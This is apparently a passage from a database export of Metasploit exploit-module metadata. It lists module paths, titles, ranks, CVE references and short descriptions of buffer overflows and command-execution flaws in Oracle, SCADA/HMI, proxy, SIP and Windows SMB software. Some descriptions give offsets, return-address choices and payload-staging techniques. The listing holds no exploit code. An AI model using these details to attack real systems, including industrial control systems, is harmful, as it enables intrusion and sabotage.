attackers to upload and execute arbitrary code. This module has been tested successfully on Oracle Database 11g 11.2.0.1.0 on Windows 2003 SP2, where execution through the Windows Management Instrumentation service has been used.","Metasploit Framework License (BSD)","t","2011-01-18 00:00:00",0,,"aggressive","t","BID-45883, CVE-2010-3600, OSVDB-70546, URL-http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-018/","1c239c43f521145fa8385d64a9c32243, juan vazquez " 1023,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/oracle/extjob.rb","exploit","windows/oracle/extjob","exploit/windows/oracle/extjob","Oracle Job Scheduler Named Pipe Command Execution",600,"This module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job Scheduler is implemented via the component extjob.exe which listens on a named pipe called ""orcljsex"" and execute arbitrary commands received over this channel via CreateProcess(). In order to connect to the Named Pipe remotely, SMB access is required. Note that the Job Scheduler is disabled in default installations.","Metasploit Framework License (BSD)","t","2007-01-01 00:00:00",0,,"aggressive","t","URL-http://www.amazon.com/Oracle-Hackers-Handbook-Hacking-Defending/dp/0470080221","David Litchfield, juan vazquez , sinn3r " 1024,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/oracle/osb_ndmp_auth.rb","exploit","windows/oracle/osb_ndmp_auth","exploit/windows/oracle/osb_ndmp_auth","Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow",400,"The module exploits a stack buffer overflow in Oracle Secure Backup. When sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-01-14 00:00:00",0,,"aggressive","t","CVE-2008-5444, OSVDB-51340, URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html","MC " 1025,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/oracle/tns_arguments.rb","exploit","windows/oracle/tns_arguments","exploit/windows/oracle/tns_arguments","Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow",400,"This module exploits a stack buffer overflow in Oracle 8i. When sending a specially crafted packet containing a overly long ARGUMENTS string to the TNS service, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2001-06-28 00:00:00",0,,"aggressive","t","BID-2941, CVE-2001-0499, OSVDB-9427","MC " 1026,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/oracle/tns_auth_sesskey.rb","exploit","windows/oracle/tns_auth_sesskey","exploit/windows/oracle/tns_auth_sesskey","Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow",500,"This module exploits a stack buffer overflow in Oracle. When sending a specially crafted packet containing a long AUTH_SESSKEY value to the TNS service, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-10-20 00:00:00",0,,"aggressive","t","BID-36747, CVE-2009-1979, OSVDB-59110, URL-http://blogs.conus.info/node/28, URL-http://blogs.conus.info/node/35, URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2009.html","jduck " 1027,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/oracle/tns_service_name.rb","exploit","windows/oracle/tns_service_name","exploit/windows/oracle/tns_service_name","Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow",400,"This module exploits a stack buffer overflow in Oracle. When sending a specially crafted packet containing a long SERVICE_NAME to the TNS service, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2002-05-27 00:00:00",0,,"aggressive","t","BID-4845, CVE-2002-0965, OSVDB-5041, URL-http://www.appsecinc.com/resources/alerts/oracle/02-0013.shtml, URL-http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf","MC " 1028,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/pop3/seattlelab_pass.rb","exploit","windows/pop3/seattlelab_pass","exploit/windows/pop3/seattlelab_pass","Seattle Lab Mail 5.5 POP3 Buffer Overflow",500,"There exists an unauthenticated buffer overflow vulnerability in the POP3 server of Seattle Lab Mail 5.5 when sending a password with excessive length. Successful exploitation should not crash either the service or the server; however, after initial use the port cannot be reused for successive exploitation until the service has been restarted. Consider using a command execution payload following the bind shell to restart the service if you need to reuse the same port. The overflow appears to occur in the debugging/error reporting section of the slmail.exe executable, and there are multiple offsets that will lead to successful exploitation. This exploit uses 2606, the offset that creates the smallest overall payload. The other offset is 4654. The return address is overwritten with a ""jmp esp"" call from the application library SLMFC.DLL found in %SYSTEM%\system32\. This return address works against all version of Windows and service packs. The last modification date on the library is dated 06/02/99. Assuming that the code where the overflow occurs has not changed in some time, prior version of SLMail may also be vulnerable with this exploit. The author has not been able to acquire older versions of SLMail for testing purposes. Please let us know if you were able to get this exploit working against other SLMail versions.","Metasploit Framework License (BSD)","t","2003-05-07 00:00:00",0,,"aggressive","t","BID-7519, CVE-2003-0264, OSVDB-11975","stinko " 1029,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/postgres/postgres_payload.rb","exploit","windows/postgres/postgres_payload","exploit/windows/postgres/postgres_payload","PostgreSQL for Microsoft Windows Payload Execution",600,"On default Microsoft Windows installations of PostgreSQL the postgres service account may write to the current directory (which is usually ""C:\Program Files\PostgreSQL\\data"" where is the major.minor version of PostgreSQL). UDF DLL's may be sourced from there as well. This module uploads a Windows DLL file via the pg_largeobject method of binary injection and creates a UDF (user defined function) from that DLL. Because the payload is run from DllMain, it does not need to conform to specific Postgres API versions.","Metasploit Framework License (BSD)","f","2009-04-10 00:00:00",0,,"aggressive","t","URL-http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql, URL-http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf","Bernardo Damele A. G. , todb " 1030,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb","exploit","windows/proxy/bluecoat_winproxy_host","exploit/windows/proxy/bluecoat_winproxy_host","Blue Coat WinProxy Host Header Overflow",500,"This module exploits a buffer overflow in the Blue Coat Systems WinProxy service by sending a long port value for the Host header in a HTTP request.","Metasploit Framework License (BSD)","t","2005-01-05 00:00:00",0,,"aggressive","t","BID-16147, CVE-2005-4085, OSVDB-22238, URL-http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html","MC " 1031,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb","exploit","windows/proxy/ccproxy_telnet_ping","exploit/windows/proxy/ccproxy_telnet_ping","CCProxy <= v6.2 Telnet Proxy Ping Overflow",200,"This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service. The stack is overwritten when sending an overly long address to the 'ping' command.","Metasploit Framework License (BSD)","f","2004-11-11 00:00:00",,,"aggressive","t","BID-11666, CVE-2004-2416, EDB-621, OSVDB-11593","patrick " 1032,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/proxy/proxypro_http_get.rb","exploit","windows/proxy/proxypro_http_get","exploit/windows/proxy/proxypro_http_get","Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow",500,"This module exploits a stack buffer overflow in Proxy-Pro Professional GateKeeper 4.7. By sending a long HTTP GET to the default port of 3128, a remote attacker could overflow a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2004-02-23 00:00:00",0,,"aggressive","t","BID-9716, CVE-2004-0326, OSVDB-4027","MC " 1033,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb","exploit","windows/proxy/qbik_wingate_wwwproxy","exploit/windows/proxy/qbik_wingate_wwwproxy","Qbik WinGate WWW Proxy Server URL Processing Overflow",400,"This module exploits a stack buffer overflow in Qbik WinGate version 6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the HTTP proxy service on port 80, a remote attacker could overflow a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2006-06-07 00:00:00",0,,"aggressive","t","BID-18312, CVE-2006-2926, OSVDB-26214","patrick " 1034,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/citect_scada_odbc.rb","exploit","windows/scada/citect_scada_odbc","exploit/windows/scada/citect_scada_odbc","CitectSCADA/CitectFacilities ODBC Buffer Overflow",300,"This module exploits a stack buffer overflow in CitectSCADA's ODBC daemon. This has only been tested against Citect v5, v6 and v7.","Metasploit Framework License (BSD)","f","2008-06-11 00:00:00",,,"aggressive","t","BID-29634, CVE-2008-2639, OSVDB-46105, URL-http://www.auscert.org.au/render.html?it=9433, URL-http://www.citect.com/documents/news_and_media/pr-citect-address-security.pdf, URL-http://www.controsys.hu/anyagok/group_quality_assurance.pdf, URL-http://www.coresecurity.com/content/citect-scada-odbc-service-vulnerability","KF , patrick " 1035,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb","exploit","windows/scada/codesys_gateway_server_traversal","exploit/windows/scada/codesys_gateway_server_traversal","SCADA 3S CoDeSys Gateway Server Directory Traversal",600,"This module exploits a directory traversal vulnerability that allows arbitrary file creation, which can be used to execute a mof file in order to gain remote execution within the SCADA system.","MSF_LICENSE","f","2013-02-02 00:00:00",0,,"aggressive","t","CVE-2012-4705, URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-050-01-a.pdf","Enrique Sanchez " 1036,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/codesys_web_server.rb","exploit","windows/scada/codesys_web_server","exploit/windows/scada/codesys_web_server","SCADA 3S CoDeSys CmpWebServer <= v3.4 SP4 Patch 2 Stack Buffer Overflow",300,"This module exploits a remote stack buffer overflow vulnerability in 3S-Smart Software Solutions product CoDeSys Scada Web Server Version 1.1.9.9.","Metasploit Framework License (BSD)","f","2011-12-02 00:00:00",,,"aggressive","t","CVE-2011-5007, EDB-18187, OSVDB-77387, URL-http://aluigi.altervista.org/adv/codesys_1-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-336-01A.pdf, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-12-006-01.pdf","Celil UNUVER, Luigi Auriemma, Michael Coppola, TecR0c , sinn3r " 1037,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/daq_factory_bof.rb","exploit","windows/scada/daq_factory_bof","exploit/windows/scada/daq_factory_bof","DaqFactory HMI NETB Request Overflow",400,"This module exploits a stack buffer overflow in Azeotech's DaqFactory product. The specfic vulnerability is triggered when sending a specially crafted 'NETB' request to port 20034. Exploitation of this vulnerability may take a few seconds due to the use of egghunter. This vulnerability was one of the 14 releases discovered by researcher Luigi Auriemma.","Metasploit Framework License (BSD)","f","2011-09-13 00:00:00",0,,"aggressive","t","CVE-2011-3492, OSVDB-75496, URL-http://aluigi.altervista.org/adv/daqfactory_1-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-264-01.pdf","Luigi Auriemma, mr_me " 1038,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/factorylink_csservice.rb","exploit","windows/scada/factorylink_csservice","exploit/windows/scada/factorylink_csservice","Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow",300,"This module exploits a vulnerability found on Siemens FactoryLink 8. The vulnerability occurs when CSService.exe processes a CSMSG_ListFiles_REQ message, the user-supplied path first gets converted to ANSI format (CodePage 0), and then gets handled by a logging routine where proper bounds checking is not done, therefore causing a stack-based buffer overflow, and results arbitrary code execution.","Metasploit Framework License (BSD)","f","2011-03-25 00:00:00",,,"aggressive","t","OSVDB-72812, URL-http://aluigi.altervista.org/adv/factorylink_1-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-091-01.pdf","Luigi Auriemma , sinn3r " 1039,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/factorylink_vrn_09.rb","exploit","windows/scada/factorylink_vrn_09","exploit/windows/scada/factorylink_vrn_09","Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow",200,"This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2, and 8.0.1.703. By sending a specially crafted packet, an attacker may be able to execute arbitrary code due to the improper use of a vsprintf() function while processing the user-supplied text field. Originally found and posted by Luigi Auriemma.","Metasploit Framework License (BSD)","t","2011-03-21 00:00:00",,,"aggressive","t","OSVDB-72815, URL-http://aluigi.altervista.org/adv/factorylink_4-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-091-01.pdf","Luigi Auriemma, MC , hal" 1040,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/iconics_genbroker.rb","exploit","windows/scada/iconics_genbroker","exploit/windows/scada/iconics_genbroker","Iconics GENESIS32 Integer overflow version 9.21.201.01",400,"The GenBroker service on port 38080 is affected by three integer overflow vulnerabilities while handling opcode 0x4b0, which is caused by abusing the the memory allocations needed for the number of elements passed by the client. This results unexpected behaviors such as direct registry calls, memory location calls, or arbitrary remote code execution. Please note that in order to ensure reliability, this exploit will try to open calc (hidden), inject itself into the process, and then open up a shell session. Also, DEP bypass is supported.","Metasploit Framework License (BSD)","f","2011-03-21 00:00:00",0,,"aggressive","t","OSVDB-72817, URL-http://aluigi.org/adv/genesis_4-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-080-02.pdf","Lincoln, Luigi Auriemma, corelanc0d3r " 1041,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb","exploit","windows/scada/iconics_webhmi_setactivexguid","exploit/windows/scada/iconics_webhmi_setactivexguid","ICONICS WebHMI ActiveX Buffer Overflow",400,"This module exploits a vulnerability found in ICONICS WebHMI's ActiveX control. By supplying a long string of data to the 'SetActiveXGUID' parameter, GenVersion.dll fails to do any proper bounds checking before this input is copied onto the stack, which causes a buffer overflow, and results arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2011-05-05 00:00:00",0,,"passive","t","CVE-2011-2089, EDB-17240, OSVDB-72135, URL-http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf, URL-http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-080-02.pdf","Blair Strang , Scoot Bell , sinn3r " 1042,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb","exploit","windows/scada/igss9_igssdataserver_listall","exploit/windows/scada/igss9_igssdataserver_listall","7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Buffer Overflow",400,"This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application fails to do proper bounds checking before copying data into a small buffer on the stack. This causes a buffer overflow and allows to overwrite a structured exception handling record on the stack, allowing for unauthenticated remote code execution. Also, after the payload exits, IGSSdataServer.exe should automatically recover.","Metasploit Framework License (BSD)","f","2011-03-24 00:00:00",0,,"aggressive","t","CVE-2011-1567, OSVDB-72353, URL-http://aluigi.altervista.org/adv/igss_2-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-132-01A.pdf","Lincoln, Luigi Auriemma, corelanc0d3r , sinn3r " 1043,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb","exploit","windows/scada/igss9_igssdataserver_rename","exploit/windows/scada/igss9_igssdataserver_rename","7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow",300,"This module exploits a vulnerability found on 7-Technologies IGSS 9. By supplying a long string of data to the 'Rename' (0x02), 'Delete' (0x03), or 'Add' (0x04) command, a buffer overflow condition occurs in IGSSdataServer.exe while handing an RMS report, which results arbitrary code execution under the context of the user. The attack is carried out in three stages. The first stage sends the final payload to IGSSdataServer.exe, which will remain in memory. The second stage sends the Add command so the process can find a valid ID for the Rename command. The last stage then triggers the vulnerability with the Rename command, and uses an egghunter to search for the shellcode that we sent in stage 1. The use of egghunter appears to be necessary due to the small buffer size, which cannot even contain our ROP chain and the final payload.","Metasploit Framework License (BSD)","f","2011-03-24 00:00:00",,,"aggressive","t","CVE-2011-1567, OSVDB-72352, URL-http://aluigi.altervista.org/adv/igss_5-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-132-01A.pdf","Luigi Auriemma , sinn3r " 1044,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/igss9_misc.rb","exploit","windows/scada/igss9_misc","exploit/windows/scada/igss9_misc","7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities",600,"This module exploits multiple vulnerabilities found on IGSS 9's Data Server and Data Collector services. The initial approach is first by transferring our binary with Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then send an EXE packet (opcode 0x0A) to port 12397 (dc.exe), which will cause dc.exe to run that payload with a CreateProcessA() function as a new thread.","Metasploit Framework License (BSD)","f","2011-03-24 00:00:00",,,"aggressive","t","CVE-2011-1565, CVE-2011-1566, OSVDB-72349, OSVDB-72354, URL-http://aluigi.altervista.org/adv/igss_1-adv.txt, URL-http://aluigi.altervista.org/adv/igss_8-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-132-01A.pdf","Luigi Auriemma, sinn3r " 1045,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/indusoft_webstudio_exec.rb","exploit","windows/scada/indusoft_webstudio_exec","exploit/windows/scada/indusoft_webstudio_exec","InduSoft Web Studio Arbitrary Upload Remote Code Execution",600,"This module exploits a lack of authentication and authorization on the InduSoft Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to the filesystem, by abusing the functions provided by the software. The module uses uses the Windows Management Instrumentation service to execute an arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows pre Vista. It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows XP SP3 and Windows 2003 SP2.","Metasploit Framework License (BSD)","t","2011-11-04 00:00:00",0,,"aggressive","t","BID-50675, CVE-2011-4051, OSVDB-77179, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-330","Luigi Auriemma, juan vazquez " 1046,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/moxa_mdmtool.rb","exploit","windows/scada/moxa_mdmtool","exploit/windows/scada/moxa_mdmtool","MOXA Device Manager Tool 2.1 Buffer Overflow",500,"This module exploits a stack buffer overflow in MOXA MDM Tool 2.1. When sending a specially crafted MDMGw (MDM2_Gateway) response, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-10-20 00:00:00",0,,"passive","t","CVE-2010-4741, OSVDB-69027, URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf","MC , Ruben Santamarta" 1047,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/procyon_core_server.rb","exploit","windows/scada/procyon_core_server","exploit/windows/scada/procyon_core_server","Procyon Core Server HMI <= v1.13 Coreservice.exe Stack Buffer Overflow",300,"This module exploits a vulnerability in the coreservice.exe component of Proycon Core Server <= v1.13. While processing a password, the application fails to do proper bounds checking before copying data into a small buffer on the stack. This causes a buffer overflow and allows to overwrite a structured exception handling record on the stack, allowing for unauthenticated remote code execution. Also, after the payload exits, Coreservice.exe should automatically recover.","Metasploit Framework License (BSD)","t","2011-09-08 00:00:00",0,,"aggressive","t","CVE-2011-3322, OSVDB-75371, URL-http://www.stratsec.net/Research/Advisories/Procyon-Core-Server-HMI-Remote-Stack-Overflow, URL-http://www.uscert.gov/control_systems/pdf/ICSA-11-216-01.pdf","Knud Hojgaard , mr_me " 1048,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/realwin.rb","exploit","windows/scada/realwin","exploit/windows/scada/realwin","DATAC RealWin SCADA Server Buffer Overflow",500,"This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 (Build 6.0.10.37). By sending a specially crafted FC_INFOTAG/SET_CONTROL packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2008-09-26 00:00:00",0,,"aggressive","t","BID-31418, CVE-2008-4322, OSVDB-48606","MC " 1049,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb","exploit","windows/scada/realwin_on_fc_binfile_a","exploit/windows/scada/realwin_on_fc_binfile_a","DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow",500,"This module exploits a vulnerability found in DATAC Control International RealWin SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE packet via port 910, RealWin will try to create a file (which would be saved to C:\Program Files\DATAC\Real Win\RW-version\filename) by first copying the user- supplied filename with a inline memcpy routine without proper bounds checking, which results a stack-based buffer overflow, allowing arbitrary remote code execution. Tested version: 2.0 (Build 6.1.8.10)","Metasploit Framework License (BSD)","t","2011-03-21 00:00:00",0,,"aggressive","t","BID-46937, CVE-2011-1563, OSVDB-72826, URL-http://aluigi.altervista.org/adv/realwin_5-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-110-01.pdf","Luigi Auriemma, MC " 1050,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/realwin_on_fcs_login.rb","exploit","windows/scada/realwin_on_fcs_login","exploit/windows/scada/realwin_on_fcs_login","RealWin SCADA Server DATAC Login Buffer Overflow",500,"This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.1 (Build 6.0.10.10) or earlier. By sending a specially crafted On_FC_CONNECT_FCS_LOGIN packet containing a long username, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2011-03-21 00:00:00",0,,"aggressive","t","CVE-2011-1563, OSVDB-72824, URL-http://aluigi.altervista.org/adv/realwin_2-adv.txt, URL-http://www.dataconline.com/software/realwin.php, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-110-01.pdf","B|H , Luigi Auriemma, MC " 1051,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/realwin_scpc_initialize.rb","exploit","windows/scada/realwin_scpc_initialize","exploit/windows/scada/realwin_scpc_initialize","DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow",500,"This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 (Build 6.1.8.10). By sending a specially crafted packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2010-10-15 00:00:00",0,,"aggressive","t","CVE-2010-4142, OSVDB-68812, URL-http://aluigi.altervista.org/adv/realwin_1-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-10-313-01.pdf","Luigi Auriemma, MC " 1052,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb","exploit","windows/scada/realwin_scpc_initialize_rf","exploit/windows/scada/realwin_scpc_initialize_rf","DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow",500,"This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 (Build 6.1.8.10). By sending a specially crafted packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2010-10-15 00:00:00",0,,"aggressive","t","CVE-2010-4142, OSVDB-68812, URL-http://aluigi.altervista.org/adv/realwin_1-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-10-313-01.pdf","Luigi Auriemma, MC " 1053,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/realwin_scpc_txtevent.rb","exploit","windows/scada/realwin_scpc_txtevent","exploit/windows/scada/realwin_scpc_txtevent","DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow",500,"This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 (Build 6.1.8.10). By sending a specially crafted packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2010-11-18 00:00:00",0,,"aggressive","t","CVE-2010-4142, OSVDB-68812","Luigi Auriemma, MC " 1054,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/scadapro_cmdexe.rb","exploit","windows/scada/scadapro_cmdexe","exploit/windows/scada/scadapro_cmdexe","Measuresoft ScadaPro <= 4.0.0 Remote Command Execution",600,"This module allows remote attackers to execute arbitray commands on the affected system by abusing via Directory Traversal attack when using the 'xf' command (execute function). An attacker can execute system() from msvcrt.dll to upload a backdoor and gain remote code execution.","Metasploit Framework License (BSD)","f","2011-09-16 00:00:00",0,,"passive","t","BID-49613, CVE-2011-3497, OSVDB-75490, URL-http://aluigi.altervista.org/adv/scadapro_1-adv.txt, URL-http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf, URL-http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx","Luigi Auriemma, TecR0c , mr_me " 1055,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb","exploit","windows/scada/sunway_force_control_netdbsrv","exploit/windows/scada/sunway_force_control_netdbsrv","Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57",500,"This module exploits a stack based buffer overflow found in the SNMP NetDBServer service of Sunway Forcecontrol <= 6.1 sp3. The overflow is triggered when sending an overly long string to the listening service on port 2001.","Metasploit Framework License (BSD)","t","2011-09-22 00:00:00",0,,"aggressive","t","BID-49747, OSVDB-75798, URL-http://aluigi.altervista.org/adv/forcecontrol_1-adv.txt","James Fitts , Luigi Auriemma, Rinat Ziyayev" 1056,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/winlog_runtime.rb","exploit","windows/scada/winlog_runtime","exploit/windows/scada/winlog_runtime","Sielco Sistemi Winlog Buffer Overflow",500,"This module exploits a buffer overflow in Sielco Sistem Winlog <= 2.07.00. When sending a specially formatted packet to the Runtime.exe service, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2011-01-13 00:00:00",0,,"aggressive","t","CVE-2011-0517, OSVDB-70418, URL-http://aluigi.org/adv/winlog_1-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-017-02.pdf","Luigi Auriemma, MC " 1057,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/winlog_runtime_2.rb","exploit","windows/scada/winlog_runtime_2","exploit/windows/scada/winlog_runtime_2","Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16",300,"This module exploits a buffer overflow in Sielco Sistem Winlog <= 2.07.16. When sending a specially formatted packet to the Runtime.exe service on port 46824, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2012-06-04 00:00:00",0,,"aggressive","t","BID-53811, CVE-2012-3815, EDB-18986, OSVDB-82654, URL-http://www.s3cur1ty.de/m1adv2012-001, URL-http://www.sielcosistemi.com/en/download/public/winlog_lite.html","Michael Messner " 1058,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/sip/aim_triton_cseq.rb","exploit","windows/sip/aim_triton_cseq","exploit/windows/sip/aim_triton_cseq","AIM Triton 1.0.4 CSeq Buffer Overflow",500,"This module exploits a buffer overflow in AOL\'s AIM Triton 1.0.4. By sending an overly long CSeq value, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.","Metasploit Framework License (BSD)","f","2006-07-10 00:00:00",0,,"aggressive","t","BID-18906, CVE-2006-3524, OSVDB-27122","MC " 1059,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/sip/sipxezphone_cseq.rb","exploit","windows/sip/sipxezphone_cseq","exploit/windows/sip/sipxezphone_cseq","SIPfoundry sipXezPhone 0.35a CSeq Field Overflow",500,"This module exploits a buffer overflow in SIPfoundry's sipXezPhone version 0.35a. By sending an long CSeq header, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.","Metasploit Framework License (BSD)","f","2006-07-10 00:00:00",0,,"aggressive","t","BID-18906, CVE-2006-3524, OSVDB-27122","MC " 1060,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/sip/sipxphone_cseq.rb","exploit","windows/sip/sipxphone_cseq","exploit/windows/sip/sipxphone_cseq","SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow",500,"This module exploits a buffer overflow in SIPfoundry's sipXphone 2.6.0.27. By sending an overly long CSeq value, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.","Metasploit Framework License (BSD)","f","2006-07-10 00:00:00",0,,"aggressive","t","BID-18906, CVE-2006-3524, OSVDB-27122","MC " 1061,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms03_049_netapi.rb","exploit","windows/smb/ms03_049_netapi","exploit/windows/smb/ms03_049_netapi","Microsoft Workstation Service NetAddAlternateComputerName Overflow",400,"This module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName function using the Workstation service in Windows XP.","Metasploit Framework License (BSD)","t","2003-11-11 00:00:00",0,,"aggressive","t","BID-9011, CVE-2003-0812, MSB-MS03-049, 